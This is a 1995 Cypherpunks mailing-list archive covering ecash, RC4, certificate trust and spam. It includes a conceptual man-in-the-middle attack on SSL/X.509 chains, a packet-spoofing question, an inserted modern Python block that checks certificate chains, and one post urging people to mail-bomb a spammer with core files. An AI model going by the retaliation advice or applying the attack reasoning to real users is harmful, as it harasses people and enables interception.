is not designed to create an efficient government, it's meant to stop them 
getting much done.

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 1 Nov 1995 11:08:23 +0800
To: hallam@w3.org
Subject: Re: Please send cash
In-Reply-To: <9511010212.AA30561@zorch.w3.org>
Message-ID: <9511010226.AA02469@all.net>
MIME-Version: 1.0
Content-Type: text


> > While HotJava prevents applets from actively opening connections that
> > violate the user-selected security policy, it allows an applet to accept
> > connections from anywhere.  At this point, an applet only has to use any one
> > of a number of channels to communicate where it is, and have the remote end
> > do the active open.
> 
> What if I start a Java applet then send it a faked TCP/IP packet from another 
> host? Can I hotwire an outgoing connection that appears to be from the victim 
> host?

I think so.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 2 Nov 1995 18:33:19 +0800
To: cypherpunks@toad.com
Subject: Re: From Bill Frezza: Electronic Warfare
In-Reply-To: <199511010500.GAA03716@utopia.hacktic.nl>
Message-ID: <Pine.ULT.3.91.951031212735.8947A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 1 Nov 1995, Anonymous wrote:

> On Tue, 31 Oct 1995, Bill Frezza <frezza@interramp.com> wrote:
> 
> > Attached is a column that will appear on the op-ed page of tomorrow's
> > (10/30) Communications Week that was stimulated largely by a report filed
> 
> > Cypherpunks mailing list (majordomo@toad.com) you can get some excellent
> 
> list address is cypherpunks@toad.com
> list manager is majordomo@toad.com
> sending list mail to majordomo will not work

Sending mail without valid commands to majordomo will give you a help
file.  You don't *really* want the actual list address to be published
everywhere, do you? I think the noise/signal ratio is high enough already.

cypherpunks-request@toad.com would have been better, because it gives a 
more specific help file. URL would have been better still. But not the 
address.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 1 Nov 1995 14:29:00 +0800
To: cypherpunks@toad.com
Subject: Digicash tagged with payee?
Message-ID: <199511010604.WAA25344@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I have heard it claimed that when you make a payment with Digicash ecash,
the identity of the payee is encoded or embedded into the cash somehow.
This is an anti-theft measure (among other things, perhaps).  The bank
checks that the embedded identity in deposited cash matches the account
name which is doing the deposit.

My question is, how could this be done?  How can the payor, at payment
time, without communicating with the bank, embed a payee name
irreversibly into the cash so that a thief cannot strip it out and
replace it with his own name?

Is it perhaps a matter of encrypting the cash with the public key of
the payee?  If so, how does the payor get that?  Is it provided by the
payee during the TCP connection?  Is it authenticated with a
certificate, perhaps signed by some Digicash root key?

Off-list there has been some discussion about the role of certificates in
ecash, and in cash systems in general.  It would be interesting to know
if this anti-theft provision of Digicash is actually provided by means of
a certificate.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Wed, 1 Nov 1995 12:19:09 +0800
To: cypherpunks@toad.com
Subject: If I WANNA I'M GONNA
Message-ID: <199510312105.VAA11591@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I see all the traffic analysis arguments.

They are silly. If someone wants something, they will get it.

Simple.

The only question is how long it will take.

Not if!

Just how long!

Love Always,

Carol Anne
ps Wanna argue with a loaded gun at your face? SEE!
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Thu, 2 Nov 1995 18:43:31 +0800
To: cypherpunks@toad.com
Subject: Happy Halloween!
Message-ID: <199510312107.VAA11674@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


May you find happiness on the 
Yellow Brick Road of Cryptography.
(costuming of the highest art)

Love Always,

Carol Anne
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Wed, 1 Nov 1995 12:33:11 +0800
To: futplex@pseudonym.com
Subject: Re: ecash remailer
Message-ID: <199511010417.WAA10507@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


>> Wouldn't the ability to have the bank prove that the coins were 'cashed'
>> make this all null and void? The only way this would work would be if
>> Charlie is willing to completely forego cashing in the coins, *ever*. Should
>> he cash them in later, Ed would seem to have grounds for suspicion/complain.
>
>In the scenario I suggested, Charlie never gets coins from anyone. He just
>(falsely) claims that he was supposed to have received some from Alice.

My test copy of the Ecash software logs what coins were spent - wouldn't
something like that constitute evidence that any claim was made? Failing
that, wouldn't Ed be able to tell the bank 'these coins were
misplaced/lost/damaged. please cancel them', and then re-issue any payment due?

*If* Alice really paid Ed, then he would have evidence of such, whether
Charlie's claim is valid or not. With the cash in hand, Ed should reasonably
be able to re-issue them, just as one could put a stop-payment on a check
and re-issue.

Or am I completely missing something here? (always a possibility, I suppose :-)

Dave
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 1 Nov 1995 14:50:02 +0800
To: cypherpunks@toad.com
Subject: "Dr." Fred
Message-ID: <199511010627.WAA28538@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The most charitable explanation for "Dr." Fred is that
he's degenerated into the professional equivalent of
those pathetic aging former chess masters who try to 
eke out a subsistence living by charging five bucks a 
game. People often play with them out of sympathy, or 
for the novelty of having lost to a past great. It's 
part of the chess culture, and it's basically harmless 
and sort of quaint.

The difference, of course, is that it's almost impossible 
to have sympathy for Dr. Fred. His hustle is for a hell 
of a lot more than subsistence. He was also never actually 
a master of his field, a fact that becomes increasingly 
obvious as our exposure to him goes on. Now he's reduced
himself to trying to collect someone else's winnings.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mr. Boffo" <mixmaster@vishnu.alias.net>
Date: Sat, 30 Sep 95 22:49:38 PDT
To: cypherpunks@toad.com
Subject: Re: RSA's comments on RC4 weak keys
In-Reply-To: <9508298124.AA812423895@snail.rsa.com>
Message-ID: <199510010537.AAA09694@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


Robert W. Baldwin <baldwin@RSA.COM> wrote:

> Here is our response to the excellent work that Andrew Roos has been
> doing on RC4.  I am glad that people are looking at RC4 critically.

Oh really?  A year ago you didn't want anyone looking at RC4 at all!

But since you now seem to be for open review, we'd be happy to
cryptanalyze RC2 for ya also.  :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 1 Oct 95 01:12:58 PDT
To: cypherpunks@toad.com
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <199510010812.BAA11516@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>What you have described is the classic 'man in the middle' attack.
>Netscape claims that SSL V.3 is immune to the MITM attack in
>appendix D.4 of the SSL V.3 spec. 
>
>You will need to get the 'filter' (MITM) key signed by Verisign.
>Or hack Verisign's server-key-signing key.

Or hack the Web of Trust used to verify the server's identity.
It _is_ still a Web of Trust even if it's a fascistly-hierarchical tree;
as long as it's possible to get a certificate without heavy contractual
obligations, you can hack it, since the software has no way to check,
now that Netscape is being nice and open and allowing non-Verisign certs.
Remember that anybody can be a CA, and keys can be signed by multiple CAs.

        Verisign Business CA signs Carol's Certification Consultants' key.
        Carol signs Bob's Better Browser Business's key.  
        Bob runs a server, selling really cool web tools.
        Verisign Business CA signs Moriarty's Mallet Makers' key.
        Moriarty signs Mr. X's persona key (trust us.)
        Mr. X makes a key called Bob's Better Browser Business,
        looking suspiciously like the real thing, only it's
        signed by Mr. X, and nobody bothered telling Bob about it.

        Alice, using Netscape, encounters http://www.Bob'sBetterBrowser.com/,
        and decides to order a Better Browser.  She gets Bob's public key
        and X.509 certificates by pressing a button, and receives a key
        and a pile of certs.  Since it's not a secure session yet, is Mr. X
        intercepting them and sending her _his_ key and cert for "Bob" and his
        persona key with cert from Moriarty and his key and cert from Verisign?
        
        So Mr. X rips off Alice and/or Bob somewhere here, and Alice decides
        to sue Bob, who says "Hey, that's not my key, see my real set of certs",
        so they go off after Mr. X, who they can't find, and then go after
        Moriarty, who says "Hey, it's just a persona certificate; all I
        guaranteed was that I didn't sign more than one with the same name
        on it",
        which in fact appears to be true, and while after one case you can't 
        be sure that there really wasn't a Mr. X somewhere, if three or four
        people start walking in saying Mr. X ripped them off using a key
        that Moriarty signed, maybe somebody'll think it's a movement...

And remember that if you can finesse a signature, you can fake a Diffie-Hellman
session with authenticated keyparts into tolerating your MITM attack, because
you can convince Alice's browser into accepting the fake key for Bob,
and as far as Bob knows, Alice is just another web-client that he doesn't
know from Adam.

Now, X.509 certs don't limit themselves to hierarchical or Web use, and most
advice on using them recommends limiting the depth of a tree/web that you're
willing to trust.  Unfortunately, X.509 certs don't even have a comment field,
much less a standardized "how much do you trust this person you're signing"
field, though I suppose you can cram a bit into the X.400/500-style name formats.

So if people want to really trust their digital signature system to prevent
forgeries, then either there's got to be a law demanding lots of government-
approved is-a-person nationalized ID card Internet Driver's License stuff, 
or else there's a market need for companies providing heavy-duty contractual 
backing for their key signatures (e.g. "In return for us signing your CA key 
with our high-trust CA key, you agree to accept $XM of liability for any misuse
of keys you sign with it and to force anybody whose key you sign to also sign
a contract like this one").  Probably a need for some standards to go with it.

There's also a need for browsers and any associated certificate checkers to
provide good user interfaces (so the _user_ can read the signature chain)
and good tools to help the user decide what to trust.  At minimum, the user
interface probably should support things like different required amounts of
trust for different categories of communication, e.g. business vs. personal
letters vs. politics vs. smuggling.


[This whole posting has been very annoying to write; I've just gone and
argued that you can munge an X.509 hierarchy back into the Web of Trust
and avoid the special-case treatment of Very Important CAs by just signing
the top nodes of a hierarchy yourself and treating them like any other
web-of-trust chain, and been thanking Netscape for allowing us to use
open protocols instead of depending on Big Organizational Infrastructures
that are run by the CON, and now I find myself posting a counter-example
that says sometimes you have to be very careful and/or reinvent Bigness
to avoid getting ripped off.  But, hey, while it's not a demonstrated hack,
it's at least the theory for pulling one off, so even if it doesn't get
me a T-shirt, at least it wins me a GIF of one :-) ]
        
        
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
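
The signing scenario in the message above, modelled as an added example that is not part of the original post: a relying-party check that applies the depth limit the message mentions and also reports any subject name for which two different keys both chain to a trusted root. Signature verification is assumed to have succeeded already; the key identifiers (`K-bob`, `K-fakebob`, ...) and function names are constructed for illustration.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Cert:
    subject: str      # name the certificate asserts
    key_id: str       # stand-in for the subject's public key (constructed)
    issuer_key: str   # key_id of the key that signed this certificate


BOB = "Bob's Better Browser Business"
ROOTS = {"K-verisign"}  # Verisign Business CA, trusted directly

# Constructed certificate set following the message's two chains.
CERTS = [
    Cert("Carol's Certification Consultants", "K-carol", "K-verisign"),
    Cert(BOB, "K-bob", "K-carol"),
    Cert("Moriarty's Mallet Makers", "K-moriarty", "K-verisign"),
    Cert("Mr. X", "K-x", "K-moriarty"),
    Cert(BOB, "K-fakebob", "K-x"),  # same name, different key
]


def chain_to_root(leaf, certs, roots):
    """Return the intermediate certs between leaf and a trusted root.

    None means no chain exists (unknown signer or a signing loop).
    """
    by_key = {c.key_id: c for c in certs}
    chain, seen, signer = [], {leaf.key_id}, leaf.issuer_key
    while signer not in roots:
        issuer = by_key.get(signer)
        if issuer is None or signer in seen:
            return None
        seen.add(signer)
        chain.append(issuer)
        signer = issuer.issuer_key
    return chain


def evaluate(subject, certs, roots, max_intermediates):
    """For each cert claiming `subject`: (key_id, intermediates, accepted)."""
    results = []
    for cert in certs:
        if cert.subject != subject:
            continue
        chain = chain_to_root(cert, certs, roots)
        if chain is None:
            results.append((cert.key_id, None, False))
        else:
            depth = len(chain)
            results.append((cert.key_id, depth, depth <= max_intermediates))
    return results


def conflicting_subjects(certs, roots):
    """Subjects for which more than one key chains to a trusted root."""
    keys = defaultdict(set)
    for cert in certs:
        if chain_to_root(cert, certs, roots) is not None:
            keys[cert.subject].add(cert.key_id)
    return {name: sorted(ids) for name, ids in keys.items() if len(ids) > 1}


if __name__ == "__main__":
    for key_id, depth, ok in evaluate(BOB, CERTS, ROOTS, max_intermediates=1):
        print(key_id, "intermediates:", depth, "accepted" if ok else "rejected")
    print("name collisions:", conflicting_subjects(CERTS, ROOTS))
```

The depth limit separates the two chains here only because the second one is longer; had Moriarty signed the look-alike key directly, both would pass it, and only the name-collision report would show the problem.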





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 30 Sep 95 22:34:11 PDT
To: cypherpunks@toad.com
Subject: T-shirt on French TV
Message-ID: <9510010533.AA06669@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Timing is everything...

I happened to be flipping the channels while on the TV in my hotel room
Friday evening between 8 and 8:30 when I saw someone wearing the UK crypto
shirt on a talk show on French TV3.  I know no French.  A guy was standing
up wearing the shirt, turning around, holding it out for the camera, etc.
Someone sitting down was talking about it to the moderator -- I heard
words like cryptographique a few times.  When the speaker pointed to the
"may be illegal in France" part, the guy took the shirt off and the crowd
laughed.

The segment was about 10 minutes.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 30 Sep 95 23:17:30 PDT
To: cypherpunks@toad.com
Subject: Re: SAIC bought InterNic, but who is SAIC?  A spook contractor!
Message-ID: <9510010616.AA06860@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


One of the most interesting things SAIC does is run places that
monitor seismic events.  S.E.'s, by the way, are things that might be
earthquakes but could be A-bomb tests.

SAIC ran the Center for Seismic Studies in Arlington, VA.  Rick Adams,
co-founder of UUnet, made one of their machines, seismo, the UUCP hub of the
world for a couple of years.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Sat, 30 Sep 95 18:30:13 PDT
To: cypherpunks@toad.com
Subject: Re: Auto-signing
In-Reply-To: <199509302209.PAA03217@infinity.c2.org>
Message-ID: <199510010130.CAA07315@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


gmixo <gmixo@alpha.c2.org> wrote:

> would someone please send me information about any autosigning
> services.... like the gratis auto-signing.... and others like it....
> thanks

Look at http://www.hks.net/

I don't know of any others. although the moderator of comp.os.linux.announce
has a policy of PGP-signing all approved posts as a method of combatting
spam.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Flame Remailer <remailer@flame.alias.net>
Date: Sat, 30 Sep 95 18:31:10 PDT
To: cypherpunks@toad.com
Subject: Linux RSA Library (fwd)
Message-ID: <199510010131.CAA07331@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


From: Jim Kinder <jkinder@nat.com>
Newsgroups: comp.os.linux.announce
Subject: RSA Encryption Utilities.
Followup-To: comp.os.linux.development.apps
Date: Sat, 30 Sep 95 14:28:37 GMT
Organization: Network Application Technology
Lines: 39
Approved: linux-announce@news.ornl.gov (Lars Wirzenius)
Message-ID: <cola-liw-812471317-27882-1@oravannahka.helsinki.fi>
NNTP-Posting-Host: kruuna.helsinki.fi
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit

-----BEGIN PGP SIGNED MESSAGE-----

I have a set of Encryption Utilities for Linux

cyrpt - Unix sytle crypt(1) command using homebrew alogorithm

rcrypt - Beter version of crypt

primegen - Unlimited size prime number generator

rsacrypt - Unlimited key size RSA encryption system.

rsadecrypt - Decryption for rsacrypt

genkey - Generate RSA keys.

This package is similar to pgp, but the algorithms are more transparent, and
the key size is unlimited.  It uses a C++.

I wrote all of this code myself and I will give it away to whomever wants it.

I am planning on using it to write an encrypted mail system.

If you want this code I will e-mail it to you in uuencode format.


- --
Send comp.os.linux.announce submissions to: linux-announce@news.ornl.gov
PLEASE remember a short description of the software.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMG1OyIQRll5MupLRAQFHeAP9GO7IJSu0eqWbnVKWUSk/RQZU+5jwRuEv
U1TzLaRZO4F5GXG3E4awx0RonuDtOeOZ/wCls7MONlk3JP0YigpxY23jA3pbfUhx
5JdbVYrbdNm5yi18GlRgsGdhkzIyTXPB7s/F2tUAxC80fxC85LM7O1RFINRrgUrc
QDIOmJNZVMM=
=Q9w9
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Sun, 1 Oct 95 00:36:51 PDT
To: baldwin@RSA.COM
Subject: Re: RSA's comments on RC4 weak keys
In-Reply-To: <199510010537.AAA09694@alpha.jpunix.com>
Message-ID: <199510010736.DAA09592@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun Oct  1 01:37:01 1995: you scribbled...
> 
> Robert W. Baldwin <baldwin@RSA.COM> wrote:
> 
> > Here is our response to the excellent work that Andrew Roos has been
> > doing on RC4.  I am glad that people are looking at RC4 critically.

Hi.  This is a pretty intresting statement.  

Does this mean that RSA acknowledges the fact that RC4 can no longer claim
"Trade Secret" status, and therefore will stop trying to make people get a
license to use RC4?

Thanx.

...alex...


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Alex Tang <altitude@umich.edu> or Alex Tang <altitude@cic.net>

iQCVAwUBMG5E9qNd+TOtm9v5AQGWbAP9EtKLfLsz5Vw1ltkyFxhFoTGCBmxngMzg
wlNQfDJ4Qp52HwKnVZGUgxeYYzH5SNT5xRnYzjITUd6tRBI5SRO+/5DQYYLcT1/N
GXYqT7nZ5R5+SXd4XGDmzqNweW42E0HD4QPpc1Qmr+QxoCpmFb9WJZ6Onh++rAu7
abH3sNIWQsk=
=FZer
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@alpha.c2.org (Anonymous)
Date: Sun, 1 Oct 95 09:18:27 PDT
Subject: Re: WHERE did this come from?
In-Reply-To: <44kgtb$88i@news.rain.org>
Message-ID: <199510010427.VAA28730@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <44kgtb$88i@news.rain.org>,  <rivaud@rain.org> wrote:
>
>Attached to this is, (I hope), the header text from an unsolicited e-mail 
>message I received.  The return address does not work.  WHY? How can I 
>inform the sender that I hope to never receive their material again?
>
>I tried "reply-all" through Eudora, but my reply got bounced back to me 
>as undeliverable.
>
>I have removed the content of the original message. I don't know why it 
>was sent to me, but it contained material that I found offensive.
>
>Any help, or words of wisdom and enlightenment would be appreciated. 
>Information would be nice too.  

[...]

>Return-Path: Crusader@national-alliance.org Received: from asso.nis.garr.it (asso.nis.garr.it [192.12.192.10]) by coyote.rain.org (8=
>6.12/CSE) with SMTP id FAA20270; Sat, 30 Sep 1995 05:58:42 -0700 From: Crusader@national-alliance.org
>Received: by asso.nis.garr.it (4.1/1.34/ABB950929)
>	id AA14320; Sat, 30 Sep 95 13:02:20 +0100 Received: by mercury.sfsu.edu (5.0/SMI-SVR4) 
>	id AA21676; Sat, 30 Sep 95 03:43:27 -0700 Date: Sat, 30 Sep 95 03:43:27 -0700
>Message-Id: <91324721788@National-Alliance.org> Subject: The Long March 
>Apparently-To: Crusader@National-Alliance.org
>
>
>If you are concerned about the fate Western/American civiliztion and its people, please take the time to read this artcle.

[remainder of political rant deleted]


I got it too.  It was a pretty good forgery, but the web pages mentioned
seem to be owned by treborle@netcom.com.  It looks like a hit-and-run spam,
as he hasn't logged in for awhile.  But since netcom charges for disk space,
I took the liberty of mailing him a few uuencoded core files. :)  You might
want to send a few to his compuserve address too for good measure. 
(73323.603@compuserve.com)

It looks like their web site www.natvan.com got taken out already, tho they
still have the netcom one.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VMARX@ix.netcom.com (Vincent Marx )
Date: Sun, 1 Oct 95 10:04:45 PDT
Subject: Re: WHERE did this come from?
In-Reply-To: <44kgtb$88i@news.rain.org>
Message-ID: <44leli$s38@ixnews6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In <44kgtb$88i@news.rain.org> rivaud@rain.org writes: 
>
>This is a multi-part message in MIME format.
>
>---------------------------------17921121372935
>Content-Transfer-Encoding: 7bit
>Content-Type: text/plain; charset=us-ascii
>
>Attached to this is, (I hope), the header text from an unsolicited e-mail
>message I received.  The return address does not work.  WHY? How can I
>inform the sender that I hope to never receive their material again?
>
>I tried "reply-all" through Eudora, but my reply got bounced back to me
>as undeliverable.
>
>I have removed the content of the original message. I don't know why it
>was sent to me, but it contained material that I found offensive.
>
>Any help, or words of wisdom and enlightenment would be appreciated. 
>Information would be nice too.  
>

I got the SAME damned letter.  I don't know who the fascist bastard is
that sent it to me, but I sent him a reply ALSO telling him to stop
sending it to me (he sent me 3 copies) and I couldn't connect to his
server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jmrubin@ix.netcom.com (Joel Rubin)
Date: Sun, 1 Oct 95 10:23:06 PDT
Subject: Re: WHERE did this come from?
In-Reply-To: <44kgtb$88i@news.rain.org>
Message-ID: <44lh9u$qoh@ixnews7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <44leli$s38@ixnews6.ix.netcom.com>, VMARX@ix.netcom.com 
says...
>
>In <44kgtb$88i@news.rain.org> rivaud@rain.org writes: 
>>
>>This is a multi-part message in MIME format.
>>
>>---------------------------------17921121372935
>>Content-Transfer-Encoding: 7bit
>>Content-Type: text/plain; charset=us-ascii
>>
>>Attached to this is, (I hope), the header text from an unsolicited e-mail
>>message I received.  The return address does not work.  WHY? How can I
>>inform the sender that I hope to never receive their material again?
>>
>>I tried "reply-all" through Eudora, but my reply got bounced back to me
>>as undeliverable.
>>
>>I have removed the content of the original message. I don't know why it
>>was sent to me, but it contained material that I found offensive.
>>
>>Any help, or words of wisdom and enlightenment would be appreciated. 
>>Information would be nice too.  
>>
>
>I got the SAME damned letter.  I don't know who the fascist bastard is
>that sent it to me, but I sent him a reply ALSO telling him to stop
>sending it to me (he sent me 3 copies) and I couldn't connect to his
>server.
>
There was a posting allegedly from a Harvey S. Cohen at AT&T on 
soc.culture.jewish to the effect that the "Long March" email is, in 
fact, a fraud intended to get the National Alliance in trouble. (a noble 
cause if not necessarily appropriate means)

I don't know if this is connected but I notice that a "let's use these 
big lie tactics on Usenet" posting allegedly from the National 
Alliance's Compuserve address seems to have somehow gone through the 
University of Pennsylvania.

     "Things are seldom what they seem.
      Skim milk masquerades as cream."

                                William S. Gilbert (H.M.S. Pinafore)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 1 Oct 95 10:19:44 PDT
To: Don Stephenson <Don.Stephenson@Eng.Sun.COM>
Subject: Re: NetScape's dependence upon RSA down for the count!
In-Reply-To: <9510010614.AA08538@icenine.Eng.Sun.COM>
Message-ID: <Pine.SOL.3.91.951001101443.5437A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 30 Sep 1995, Don Stephenson wrote:

> I don't think binding hostnames to certificates helps much because 
> both hostnames and IP addresses can be spoofed and DNS servers can be 
> subverted.  The important thing is the binding to the "service" name or 

In this particular case, hostnames do help, because they are information 
imbedded in the url used to access the server. By verifying the hostname 
in the certificate with the hostname in the url, you can state with a 
high degree of confidence that the object retrieved is precisely the 
desired object covered by this url. 

> Well of course, if the secret key of the server (or worse yet, certificate 
> authority) is compromised, all bets are off.  That's true of just about any 
> protocol you can dream up.

I'm not referring to the secret key of _the_ server; I'm referring to the 
secret key of _ANY_ server. In the limiting case, such a key can be 
obtained by buying one from the CA. 

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 1 Oct 95 10:26:10 PDT
To: Brian Mancuso <brianm@cs.bu.edu>
Subject: Re: WWW Proxy Server Vulnerabilities
In-Reply-To: <199510011708.NAA29261@csa.bu.edu>
Message-ID: <Pine.SOL.3.91.951001102636.5437B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Proxy servers are just an easy way to implement a demonstration attack. 
Fortunately, they are also a way to improve security, as long as you can 
set one up on a machine to which you have a relatively trusted path 
(localhost)

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edgar@highnrg.sbay.org (Edgar Swank)
Date: Sun, 1 Oct 95 11:26:52 PDT
To: Cypherpunks          <cypherpunks@toad.com>
Subject: SecureDrive News - Win95, non-USA ftp sites
Message-ID: <BqZacD15w165w@highnrg.sbay.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have received the following information about running SecureDrive
1.4 with Win95, thanks to Ed Stone,

    This is what I sent to a person who asked how to use secdrive on
    win95......

    >>>>>>>>>>>>>>>>>>>>>inserted text follows
    Try this:

    in your autoexec.bat file enter this, using your path to secdrive:

    C:\your-path-to-secdrive\SECTSR
    C:\your-path-to-secdrive\LOGIN your-encrypted-disk-letter: /S
    C:\your-path-to-secdrive\login your-encrypted-disk-letter:

    During normal win95 startup, you will be asked to enter your
    passphrase. Now when 95 come up, the tsr is running, your passphrase
    has been entered, and everything operates as if the disk is not
    encrypted. EXCEPT.... the tsr you have loaded (sectsr) makes windows
    load real-mode drivers for the disk, instead of protected mode
    drivers. This will make disk access somewhat slower, but not a big
    deal. When you startup win95 and you don't need to use secdrive,
    just hit enter when the boot process asks for your passphrase, and
    it will behave as if you entered a "wrong passphrase" and that drive
    will not be visible to win95, and protected mode drivers will
    load...

    Hope this helps.

In particular that the normal drivers will load even with sectsr
resident if the correct passphrase isn't entered is new and valuable
information.

I have also just learned that SecureDrive 1.4 is now available on some
non-USA (and so not export-controlled) ftp sites,

    ftp://utopia.hacktic.nl/pub/disk/secdr14.zip
    ftp://ftp.ox.ac.uk/pub/crypto/misc/secdr14.zip

I have verified that the hacktic file is an exact copy of the zip I
released in the USA.

Edgar W. Swank   <edgar@HighNRG.sbay.org>
SecureDrive Co-author

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMG2BIt4nNf3ah8DHAQH49AP/YzmRhOLk+JdPx3emgWxv7vcX/2e7KR/Y
WK0p1hiPUAHDsG3ZEd3fD+DZyILxq0oJcQSsrdtsAFiSnw955i/g+XsGFVT8UGku
YzTXB4LXnJE4IqA2qd8aUKU9xk9S57xN1p+xrLlEK2jJrFMg+h9cPMp1a0lwivvP
Ff2lF1+lthI=
=DYRV
-----END PGP SIGNATURE-----

---
edgar@HighNRG.sbay.org
Keep Freestyle Alive!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sun, 1 Oct 95 10:25:46 PDT
To: jbass@dmsd.com (John L. Bass)
Subject: Re: MITM attacks, the day after ...
In-Reply-To: <9510011649.AA12871@dmsd.com>
Message-ID: <199510011740.KAA01644@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


 
> There seem at this point to be two messenger or man in the middle attacks
> on SSL that have enough merit to explore further.
> 
> #1  Attack client binaries to suppress certificate validation, and accept
> ones forged by the filter/MITM. The binary attack could occur during download
